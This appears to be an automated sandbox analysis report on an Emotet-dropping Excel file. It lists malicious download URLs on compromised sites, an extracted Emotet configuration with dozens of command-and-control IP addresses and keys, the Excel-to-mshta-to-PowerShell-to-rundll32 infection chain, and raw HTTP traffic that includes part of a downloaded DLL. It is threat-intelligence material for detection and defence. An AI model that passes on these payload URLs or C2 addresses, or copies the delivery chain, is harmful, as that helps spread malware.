                            Source: http://91.240.118.172/gg/ff/fe.htmlWinSta0Avira URL Cloud: Label: malware
                            Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3Avira URL Cloud: Label: malware
                            Source: https://property-eg.com/mlzkir/97v/PE3Avira URL Cloud: Label: malware
                            Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/Avira URL Cloud: Label: malware
                            Source: https://property-eg.com/mlzkir/9Avira URL Cloud: Label: malware
                            Source: http://91.240.118.172Avira URL Cloud: Label: malware
                            Source: http://activetraining.sytes.net/libraries/8s/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.172/gg/ff/fe.htmlfunctionAvira URL Cloud: Label: malware
                            Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/Avira URL Cloud: Label: malware
                            Source: http://it-o.biz/bitrix/xoDdDe/Avira URL Cloud: Label: malware
                            Source: https://gudangtasorichina.com/wp-content/GG01c/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.172/gg/ff/fe.htmlYAvira URL Cloud: Label: malware
                            Source: http://totalplaytuxtla.com/sitio/DgktL3zd/Avira URL Cloud: Label: malware
                            Source: http://activetraining.sytes.net/libraries/8s/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.172/gg/ff/fe.pAvira URL Cloud: Label: malware
                            Source: http://gardeningfilm.com/wp-contAvira URL Cloud: Label: malware
                            Source: http://jurnalpjf.lan.go.id/assets/iM/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.172/gg/ff/fe.htmlBAvira URL Cloud: Label: malware
                            Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3Avira URL Cloud: Label: malware
                            Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.172/gg/ff/fe.htmlKAvira URL Cloud: Label: malware
                            Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.172/gg/ff/fe.htmlAvira URL Cloud: Label: malware
                            Found malware configuration
                            Source: 15.2.rundll32.exe.220000.1.unpackMalware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
                            Multi AV Scanner detection for submitted file
                            Source: 2022-28-01_1202.xlsReversingLabs: Detection: 11%
                            Multi AV Scanner detection for domain / URL
                            Source: hostfeeling.comVirustotal: Detection: 10%Perma Link
                            Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/Virustotal: Detection: 12%Perma Link
                            Machine Learning detection for dropped file
                            Source: C:\ProgramData\JooSee.dllJoe Sandbox ML: detected
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                            Source: Binary string: >ystem.pdbT source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_002A7E00 FindFirstFileW,17_2_002A7E00

                            Software Vulnerabilities

                            barindex
                            Document exploit detected (process start blacklist hit)
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
                            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80
                            Source: global trafficDNS query: name: hostfeeling.com
                            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80

                            Networking

                            barindex
                            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                            Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.172:80
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorIPs: 160.16.102.168:80
                            Source: Malware configuration extractorIPs: 131.100.24.231:80
                            Source: Malware configuration extractorIPs: 200.17.134.35:7080
                            Source: Malware configuration extractorIPs: 207.38.84.195:8080
                            Source: Malware configuration extractorIPs: 212.237.56.116:7080
                            Source: Malware configuration extractorIPs: 58.227.42.236:80
                            Source: Malware configuration extractorIPs: 104.251.214.46:8080
                            Source: Malware configuration extractorIPs: 158.69.222.101:443
                            Source: Malware configuration extractorIPs: 192.254.71.210:443
                            Source: Malware configuration extractorIPs: 46.55.222.11:443
                            Source: Malware configuration extractorIPs: 45.118.135.203:7080
                            Source: Malware configuration extractorIPs: 107.182.225.142:8080
                            Source: Malware configuration extractorIPs: 103.75.201.2:443
                            Source: Malware configuration extractorIPs: 104.168.155.129:8080
                            Source: Malware configuration extractorIPs: 195.154.133.20:443
                            Source: Malware configuration extractorIPs: 159.8.59.82:8080
                            Source: Malware configuration extractorIPs: 110.232.117.186:8080
                            Source: Malware configuration extractorIPs: 45.142.114.231:8080
                            Source: Malware configuration extractorIPs: 41.76.108.46:8080
                            Source: Malware configuration extractorIPs: 203.114.109.124:443
                            Source: Malware configuration extractorIPs: 50.116.54.215:443
                            Source: Malware configuration extractorIPs: 209.59.138.75:7080
                            Source: Malware configuration extractorIPs: 185.157.82.211:8080
                            Source: Malware configuration extractorIPs: 164.68.99.3:8080
                            Source: Malware configuration extractorIPs: 162.214.50.39:7080
                            Source: Malware configuration extractorIPs: 138.185.72.26:8080
                            Source: Malware configuration extractorIPs: 178.63.25.185:443
                            Source: Malware configuration extractorIPs: 51.15.4.22:443
                            Source: Malware configuration extractorIPs: 81.0.236.90:443
                            Source: Malware configuration extractorIPs: 216.158.226.206:443
                            Source: Malware configuration extractorIPs: 45.176.232.124:443
                            Source: Malware configuration extractorIPs: 162.243.175.63:443
                            Source: Malware configuration extractorIPs: 212.237.17.99:8080
                            Source: Malware configuration extractorIPs: 45.118.115.99:8080
                            Source: Malware configuration extractorIPs: 129.232.188.93:443
                            Source: Malware configuration extractorIPs: 173.214.173.220:8080
                            Source: Malware configuration extractorIPs: 178.79.147.66:8080
                            Source: Malware configuration extractorIPs: 176.104.106.96:8080
                            Source: Malware configuration extractorIPs: 51.38.71.0:443
                            Source: Malware configuration extractorIPs: 173.212.193.249:8080
                            Source: Malware configuration extractorIPs: 217.182.143.207:443
                            Source: Malware configuration extractorIPs: 212.24.98.99:8080
                            Source: Malware configuration extractorIPs: 159.89.230.105:443
                            Source: Malware configuration extractorIPs: 79.172.212.216:8080
                            Source: Malware configuration extractorIPs: 212.237.5.209:443
                            Source: global trafficHTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 23:14:50 GMTServer: Apache/2.4.6 (CentOS) PHP/7.4.27X-Powered-By: PHP/7.4.27Set-Cookie: 61f478ea13105=1643411690; expires=Fri, 28-Jan-2022 23:15:50 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Fri, 28 Jan 2022 23:14:50 GMTExpires: Fri, 28 Jan 2022 23:14:50 GMTContent-Disposition: attachment; filename="S2TSbn.dll"Content-Transfer-Encoding: binaryContent-Length: 548864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.
                            Source: global trafficHTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
                            Source: Joe Sandbox ViewASN Name: OnlineSASFR OnlineSASFR
                            Source: Joe Sandbox ViewASN Name: S-NET-ASPL S-NET-ASPL
                            Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
                            Source: Joe Sandbox ViewIP Address: 195.154.133.20 195.154.133.20
                            Source: Joe Sandbox ViewIP Address: 185.157.82.211 185.157.82.211
                            Source: Joe Sandbox ViewIP Address: 212.237.17.99 212.237.17.99
                            Source: unknownNetwork traffic detected: IP country count 21
                            Source: powershell.exe, 00000006.00000002.673143883.00000000035BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.11
                            Source: powershell.exe, 00000006.00000002.673143883.00000000035BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172
                            Source: mshta.exe, 00000004.00000002.433444835.000000000027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.html
                            Source: mshta.exe, 00000004.00000003.411734628.000000000025F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.html4
                            Source: 2022-28-01_1202.xls.0.drString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlB
                            Source: mshta.exe, 00000004.00000002.433387100.000000000021E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlK
                            Source: mshta.exe, 00000004.00000002.433371038.00000000001E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlWinSta0
                            Source: mshta.exe, 00000004.00000003.411782427.000000000027C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.428057255.000000000027C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433444835.000000000027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlY
                            Source: mshta.exe, 00000004.00000003.413147395.0000000002A4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlfunction
                            Source: mshta.exe, 00000004.00000003.413134769.0000000002A45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html
                            Source: mshta.exe, 00000004.00000002.433371038.00000000001E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlmshta
                            Source: mshta.exe, 00000004.00000002.433387100.000000000021E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlngs
                            Source: mshta.exe, 00000004.00000002.433387100.000000000021E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlv
                            Source: powershell.exe, 00000006.00000002.673143883.00000000035BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.p
                            Source: powershell.exe, 00000006.00000002.673143883.00000000035BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.675917527.000000001B87B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.png
                            Source: powershell.exe, 00000006.00000002.673143883.00000000035BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.pngPE3
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://activetraining.sytes.net/
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://activetraining.sytes.net/libraries/8s/
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://activetraining.sytes.net/libraries/8s/PE3
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bimesarayenovin.ir/wp-adm
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://daisy.suk
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://daisy.sukoburu-secure.com
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gardeningfilm.com/wp-cont
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hostfeeling.com
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hostfeeling.com/wp-admin/
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://it-o.biz/
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://it-o.biz/bitrix/xoDdDe/
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://it-o.biz/bitrix/xoDdDe/PE3
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jurnalpjf.lan.go.id
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jurnalpjf.lan.go.id/asset
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/PE3
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maxtdeveloper.com/okw9yx/
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://totalplaytuxtla.com/sitio
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inablr.com/elenctic/f
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3
                            Source: powershell.exe, 00000006.00000002.666941334.0000000000350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                            Source: mshta.exe, 00000004.00000002.433703673.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411782427.000000000027C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.428057255.000000000027C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433444835.000000000027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com
                            Source: rundll32.exe, 00000011.00000002.666782333.00000000001DD000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.667122057.00000000007E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.102.168/
                            Source: rundll32.exe, 00000011.00000002.667077231.0000000000799000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.102.168/r
                            Source: rundll32.exe, 00000011.00000002.667057361.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.102.168:80/qczEnNfFsrzyoNZZyTPVzxGYReoNlOZZRmqKBwLAih
                            Source: rundll32.exe, 00000011.00000002.667109716.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.102.168:80/qczEnNfFsrzyoNZZyTPVzxGYReoNlOZZRmqKBwLAih;
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gudangtasorichina.com/wp
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/PE3
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-eg.com/mlzkir/9
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-eg.com/mlzkir/97v/
                            Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-eg.com/mlzkir/97v/PE3
                            Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htmJump to behavior
                            Source: unknownDNS traffic detected: queries for: hostfeeling.com
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10012C30 _memset,connect,_strcat,send,recv,9_2_10012C30
                            Source: global trafficHTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
